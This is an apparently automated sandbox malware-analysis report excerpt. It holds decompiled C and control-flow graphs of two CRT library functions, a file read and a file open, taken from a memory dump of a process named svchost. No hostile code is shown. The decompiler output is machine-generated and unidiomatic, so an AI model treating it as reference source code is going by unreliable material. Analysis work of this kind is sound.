                            0x00bc1573
                            0x00bc1578
                            0x00bc157b
                            0x00bc157f
                            0x00bc1610
                            0x00bc1614
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc157f

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: c0670cc3293481cd2ff9dd16e1d9cb59a38bf990607d18526bb3834063b13dfc
                            • Instruction ID: eb39f4b92f98aa1f145c8edec88a18544ea6feaf076d5932ffa5975d83457124
                            • Opcode Fuzzy Hash: c0670cc3293481cd2ff9dd16e1d9cb59a38bf990607d18526bb3834063b13dfc
                            • Instruction Fuzzy Hash: 5C21E9B5850700ABEA207B39AC07F5A76E4AF11354F140EECF599A02E3FB72E5508A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD2128, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 228 bd2128-bd2138 229 bd213a-bd214d call bcc9bb call bcc9ce 228->229 230 bd2152-bd2154 228->230 244 bd24d4 229->244 231 bd24bc-bd24c9 call bcc9bb call bcc9ce 230->231 232 bd215a-bd2160 230->232 249 bd24cf call bd1788 231->249 232->231 234 bd2166-bd2191 232->234 234->231 237 bd2197-bd21a0 234->237 241 bd21ba-bd21bc 237->241 242 bd21a2-bd21b5 call bcc9bb call bcc9ce 237->242 247 bd24b8-bd24ba 241->247 248 bd21c2-bd21c6 241->248 242->249 250 bd24d7-bd24dc 244->250 247->250 248->247 252 bd21cc-bd21d0 248->252 249->244 252->242 255 bd21d2-bd21e9 252->255 257 bd21eb-bd21ee 255->257 258 bd2206-bd220f 255->258 261 bd21f8-bd2201 257->261 262 bd21f0-bd21f6 257->262 259 bd222d-bd2237 258->259 260 bd2211-bd2228 call bcc9bb call bcc9ce call bd1788 258->260 265 bd223e-bd225c call bd0a25 call bd09eb * 2 259->265 266 bd2239-bd223b 259->266 292 bd23ef 260->292 263 bd22a2-bd22bc 261->263 262->260 262->261 268 bd2390-bd2399 call bd8d71 263->268 269 bd22c2-bd22d2 263->269 296 bd225e-bd2274 call bcc9ce call bcc9bb 265->296 297 bd2279-bd229f call bd2807 265->297 266->265 280 bd240c 268->280 281 bd239b-bd23ad 268->281 269->268 273 bd22d8-bd22da 269->273 273->268 277 bd22e0-bd2306 273->277 277->268 282 bd230c-bd231f 277->282 284 bd2410-bd2428 ReadFile 280->284 281->280 286 bd23af-bd23be GetConsoleMode 281->286 282->268 287 bd2321-bd2323 282->287 290 bd242a-bd2430 284->290 291 bd2484-bd248f GetLastError 284->291 286->280 293 bd23c0-bd23c4 286->293 287->268 294 bd2325-bd2350 287->294 290->291 300 bd2432 290->300 298 bd24a8-bd24ab 291->298 299 bd2491-bd24a3 call bcc9ce call bcc9bb 291->299 302 bd23f2-bd23fc call bd09eb 292->302 293->284 301 bd23c6-bd23e0 ReadConsoleW 293->301 294->268 295 bd2352-bd2365 294->295 295->268 304 bd2367-bd2369 295->304 296->292 297->263 311 bd23e8-bd23ee call bcc998 298->311 312 bd24b1-bd24b3 298->312 299->292 308 bd2435-bd2447 300->308 309 bd2401-bd240a 301->309 310 bd23e2 GetLastError 301->310 302->250 304->268 314 bd236b-bd238b 304->314 308->302 318 bd2449-bd244d 308->318 309->308 310->311 311->292 312->302 314->268 322 bd244f-bd245f call bd1e42 318->322 323 bd2466-bd2471 318->323 335 bd2462-bd2464 322->335 328 bd247d-bd2482 call bd1c82 323->328 329 bd2473 call bd1f94 323->329 333 bd2478-bd247b 328->333 329->333 333->335 335->302
                            C-Code - Quality: 77%
                            			E00BD2128(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00BCC9BB();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00BCC9CE())) = 9;
						L59:
						_t145 = E00BD1788();
						goto L60;
					}
					__eflags = _t213 -  *0xbf6308; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00BD0A25(_t224, _t158);
								E00BD09EB(0);
								E00BD09EB(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00BD2807(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00BD8D71(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00BCC998(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00BCC9CE())) = 9;
											 *(E00BCC9BB()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00BD1C82();
												} else {
													_t176 = E00BD1F94();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00BD1E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t104 =  &_v28; // 0xa
									_t231 =  *_t104;
									_t178 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00BCC9CE())) = 0xc;
									 *(E00BCC9BB()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00BD09EB(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00BCC9BB()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00BCC9CE())) = 0x16;
							E00BD1788();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00BCC9BB()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					goto L59;
				} else {
					 *(E00BCC9BB()) =  *_t212 & 0x00000000;
					_t145 = E00BCC9CE();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                            0x00bd2131
                            0x00bd2138
                            0x00bd2152
                            0x00bd2154
                            0x00bd24bc
                            0x00bd24bc
                            0x00bd24c1
                            0x00bd24c1
                            0x00bd24c9
                            0x00bd24cf
                            0x00bd24cf
                            0x00000000
                            0x00bd24cf
                            0x00bd215a
                            0x00bd2160
                            0x00000000
                            0x00000000
                            0x00bd2168
                            0x00bd2174
                            0x00bd2177
                            0x00bd217a
                            0x00bd217d
                            0x00bd2184
                            0x00bd2187
                            0x00bd218b
                            0x00bd218e
                            0x00bd2191
                            0x00000000
                            0x00000000
                            0x00bd2197
                            0x00bd219a
                            0x00bd21a0
                            0x00bd21ba
                            0x00bd21bc
                            0x00bd24b8
                            0x00000000
                            0x00bd24b8
                            0x00bd21c2
                            0x00bd21c6
                            0x00000000
                            0x00000000
                            0x00bd21cc
                            0x00bd21d0
                            0x00000000
                            0x00000000
                            0x00bd21d7
                            0x00bd21db
                            0x00bd21de
                            0x00bd21e1
                            0x00bd21e6
                            0x00bd21e6
                            0x00bd21e9
                            0x00bd2206
                            0x00bd220b
                            0x00bd220d
                            0x00bd220f
                            0x00bd222f
                            0x00bd2230
                            0x00bd2232
                            0x00bd2235
                            0x00bd2237
                            0x00bd2239
                            0x00bd223b
                            0x00bd223b
                            0x00bd2246
                            0x00bd2248
                            0x00bd224f
                            0x00bd2254
                            0x00bd2257
                            0x00bd225a
                            0x00bd225c
                            0x00bd2281
                            0x00bd2286
                            0x00bd228d
                            0x00bd2290
                            0x00bd2293
                            0x00bd2297
                            0x00bd2299
                            0x00bd229d
                            0x00bd229f
                            0x00bd22a2
                            0x00bd22a5
                            0x00bd22a7
                            0x00bd22aa
                            0x00bd22b1
                            0x00bd22b4
                            0x00bd22b9
                            0x00bd22bc
                            0x00bd22c5
                            0x00bd22c9
                            0x00bd22cc
                            0x00bd22cf
                            0x00bd22d2
                            0x00bd22d8
                            0x00bd22da
                            0x00bd22e3
                            0x00bd22e6
                            0x00bd22e9
                            0x00bd22ec
                            0x00bd22ed
                            0x00bd22f1
                            0x00bd22f7
                            0x00bd2301
                            0x00bd2306
                            0x00bd2316
                            0x00bd231a
                            0x00bd231d
                            0x00bd231f
                            0x00bd2321
                            0x00bd2323
                            0x00bd2325
                            0x00bd232d
                            0x00bd232e
                            0x00bd2331
                            0x00bd2334
                            0x00bd2335
                            0x00bd233b
                            0x00bd2345
                            0x00bd234d
                            0x00bd2350
                            0x00bd235c
                            0x00bd2360
                            0x00bd2363
                            0x00bd2365
                            0x00bd2367
                            0x00bd2369
                            0x00bd236b
                            0x00bd2373
                            0x00bd2374
                            0x00bd2377
                            0x00bd237a
                            0x00bd237a
                            0x00bd237b
                            0x00bd2381
                            0x00bd238b
                            0x00bd238b
                            0x00bd2369
                            0x00bd2365
                            0x00bd2350
                            0x00bd2323
                            0x00bd231f
                            0x00bd2306
                            0x00bd22da
                            0x00bd22d2
                            0x00bd2391
                            0x00bd2397
                            0x00bd2399
                            0x00bd240c
                            0x00bd240c
                            0x00bd2410
                            0x00bd2420
                            0x00bd2426
                            0x00bd2428
                            0x00bd2484
                            0x00bd2484
                            0x00bd248c
                            0x00bd248d
                            0x00bd248f
                            0x00bd24a8
                            0x00bd24ab
                            0x00bd23e8
                            0x00bd23e9
                            0x00000000
                            0x00bd23ee
                            0x00bd24b1
                            0x00000000
                            0x00bd24b1
                            0x00bd2496
                            0x00bd24a1
                            0x00000000
                            0x00bd24a1
                            0x00bd242a
                            0x00bd242d
                            0x00bd2430
                            0x00000000
                            0x00000000
                            0x00bd2432
                            0x00bd2432
                            0x00bd2435
                            0x00bd2438
                            0x00bd243b
                            0x00bd2442
                            0x00bd2447
                            0x00bd2449
                            0x00bd244d
                            0x00bd2468
                            0x00bd246c
                            0x00bd246d
                            0x00bd2470
                            0x00bd2471
                            0x00bd247d
                            0x00bd2473
                            0x00bd2473
                            0x00bd2473
                            0x00bd244f
                            0x00bd244f
                            0x00bd244f
                            0x00bd245a
                            0x00bd245f
                            0x00bd2462
                            0x00bd2462
                            0x00000000
                            0x00bd2447
                            0x00bd239e
                            0x00bd239e
                            0x00bd23a1
                            0x00bd23a8
                            0x00bd23ad
                            0x00000000
                            0x00000000
                            0x00bd23b6
                            0x00bd23bc
                            0x00bd23be
                            0x00000000
                            0x00000000
                            0x00bd23c0
                            0x00bd23c4
                            0x00000000
                            0x00000000
                            0x00bd23d8
                            0x00bd23de
                            0x00bd23e0
                            0x00bd2404
                            0x00bd2407
                            0x00000000
                            0x00bd2407
                            0x00bd23e2
                            0x00000000
                            0x00bd225e
                            0x00bd2263
                            0x00bd226e
                            0x00bd23ef
                            0x00bd23ef
                            0x00bd23ef
                            0x00bd23f2
                            0x00bd23f3
                            0x00000000
                            0x00bd23fb
                            0x00bd225c
                            0x00bd2211
                            0x00bd2216
                            0x00bd221d
                            0x00bd2223
                            0x00000000
                            0x00bd2223
                            0x00bd21eb
                            0x00bd21ee
                            0x00bd21f8
                            0x00bd21f8
                            0x00bd21fb
                            0x00bd21fe
                            0x00000000
                            0x00bd21fe
                            0x00bd21f2
                            0x00bd21f4
                            0x00bd21f6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd21f6
                            0x00bd21a2
                            0x00bd21a7
                            0x00bd21af
                            0x00000000
                            0x00bd213a
                            0x00bd213f
                            0x00bd2142
                            0x00bd2147
                            0x00bd24d4
                            0x00000000
                            0x00bd24d4

                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: 5a8a24454ab77b184c9ccaa2a78b65c39beda3d915695c3bc789f107a7c1e10d
                            • Instruction ID: bff4143a95d9996373329706eddad119105cd9acddae45de1fe72ae26014bfa0
                            • Opcode Fuzzy Hash: 5a8a24454ab77b184c9ccaa2a78b65c39beda3d915695c3bc789f107a7c1e10d
                            • Instruction Fuzzy Hash: DBC1AF74D04289AFDF119FA8C881BADFBF0EF2A310F1441DAE954A7392E7749941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDBD1F, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 336 bdbd1f-bdbd4f call bdbaf3 339 bdbd6a-bdbd76 call bce783 336->339 340 bdbd51-bdbd5c call bcc9bb 336->340 345 bdbd8f-bdbdd8 call bdba5e 339->345 346 bdbd78-bdbd8d call bcc9bb call bcc9ce 339->346 347 bdbd5e-bdbd65 call bcc9ce 340->347 355 bdbdda-bdbde3 345->355 356 bdbe45-bdbe4e GetFileType 345->356 346->347 357 bdc041-bdc047 347->357 361 bdbe1a-bdbe40 GetLastError call bcc998 355->361 362 bdbde5-bdbde9 355->362 358 bdbe97-bdbe9a 356->358 359 bdbe50-bdbe81 GetLastError call bcc998 CloseHandle 356->359 364 bdbe9c-bdbea1 358->364 365 bdbea3-bdbea9 358->365 359->347 373 bdbe87-bdbe92 call bcc9ce 359->373 361->347 362->361 366 bdbdeb-bdbe18 call bdba5e 362->366 369 bdbead-bdbefb call bce6cc 364->369 365->369 370 bdbeab 365->370 366->356 366->361 379 bdbefd-bdbf09 call bdbc6f 369->379 380 bdbf0b-bdbf2f call bdb811 369->380 370->369 373->347 379->380 385 bdbf33-bdbf3d call bd18f4 379->385 386 bdbf31 380->386 387 bdbf42-bdbf85 380->387 385->357 386->385 389 bdbf87-bdbf8b 387->389 390 bdbfa6-bdbfb4 387->390 389->390 392 bdbf8d-bdbfa1 389->392 393 bdc03f 390->393 394 bdbfba-bdbfbe 390->394 392->390 393->357 394->393 395 bdbfc0-bdbff3 CloseHandle call bdba5e 394->395 398 bdbff5-bdc021 GetLastError call bcc998 call bce895 395->398 399 bdc027-bdc03b 395->399 398->399 399->393
                            C-Code - Quality: 42%
                            			E00BDBD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				void* _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t240 = __edx;
				_t263 = E00BDBAF3(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t263, _t192 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t192 + _t192;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00BCE783(_t240, _t249, _t264, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t197 = 0;
						_t122 = E00BDBA5E(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00BCE6CC(_t197,  *_t190, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xbf6108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t279,  &_v48, _t206 << 2);
									_t134 = E00BDB811(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0xbf6108 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
											_t246 = E00BDBA5E();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0xbf6108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
												goto L31;
											}
											E00BCC998(GetLastError());
											 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00BCE895( *_t190);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E00BDBC6F(_t205,  *_t190);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E00BD18F4(__eflags,  *_t190);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E00BCC998(_t271);
							 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00BCC9CE())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0xbf6108 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00BCC998(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t239 << 2);
						_t197 = 0;
						_t253 = E00BDBA5E();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00BCC9BB()) =  *_t186 & 0x00000000;
						 *_t190 = _t264;
						 *((intOrPtr*)(E00BCC9CE())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00BCC9BB()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00BCC9CE()));
				}
			}























































                            0x00bdbd1f
                            0x00bdbd42
                            0x00bdbd46
                            0x00bdbd47
                            0x00bdbd47
                            0x00bdbd47
                            0x00bdbd49
